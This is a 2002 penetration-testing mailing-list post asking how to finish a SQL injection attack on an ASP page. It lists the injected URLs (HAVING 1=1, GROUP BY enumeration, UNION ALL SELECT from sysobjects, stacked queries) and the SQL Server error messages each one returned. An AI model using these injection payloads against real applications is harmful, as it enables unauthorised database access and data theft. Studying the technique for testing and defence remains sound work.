Penetration Testing mailing list archives
Exploitable by SQL injection???
From: SQL injector <sql_injector () yahoo com>
Date: Sun, 7 Apr 2002 16:14:07 -0700 (PDT)
Greetings everyone. It appears that I have an ASP page that is vulnerable to direct SQL injection. Alas I am having some difficulty exploiting it. Below you will find my result set. My process is to enumerate the table and column names and then query the sysobject. My problem is that it seems that the server first tells me a valid table name and then appears to recant on it! After that it seems as through I am having a UNION problem. I am not sure whether this is due to my syntax or due to the fact that the SQL statement may reference another table that my UNION does not. My analysis is that the SQL statement is exploitable but the number of tables involved make it difficult if not impossible. Are there other ways to enumerate the other table names, if they exist? Is my syntax correct? Perhaps I need to change the UNION statement? There appears to be an ORDER BY which I?ve tried to comment out (--), but then I get a UNION syntax error. Where am I going wrong? In the final analysis: Is this thing exploitable? Also note the goal here is just to retrieve information from the database, not bypass a logon. -- Thanks sql_injector... ==================================================== Below you will find the process and the result after each: vulnerable.asp?g=1 [returns valid page] vulnerable.asp?g=1 having 1=1? Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Table.Name' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. vulnerable.asp?g=1 group by Table.Name having 1=1-- Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'Table.ID' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. vulnerable.asp?g=1 group by Table.Name, Table.ID having 1=1-- Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]The column prefix 'Table' does not match with a table name or alias name used in the query. vulnerable.asp?g=1 UNION ALL SELECT 'A',1 FROM sysobjects Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator. vulnerable.asp?g=1 UNION ALL SELECT Table.Name,Table.ID FROM sysobjects Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]The column prefix 'Table' does not match with a table name or alias name used in the query. ****Here are some very interesting URLs that perhaps get to the heart of the matter. vulnerable.asp?g=1; Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'. vulnerable.asp?g=4 UNION ALL SELECT 'A',9 FROM SysObjects WHERE 1=1 ORDER BY 1,2 Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'. vulnerable.asp?g=4 UNION ALL SELECT 'A',9 FROM SysObjects WHERE 1=1 ORDER BY 1,2? Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'UNION'. ****NOTE: Another interesting URL vulnerable.asp?g=1; SELECT name FROM sysobjects Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]The column prefix 'jTab' does not match with a table name or alias name used in the query. __________________________________________________ Do You Yahoo!? Yahoo! Tax Center - online filing with TurboTax http://taxes.yahoo.com/ ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Exploitable by SQL injection??? SQL injector (Apr 08)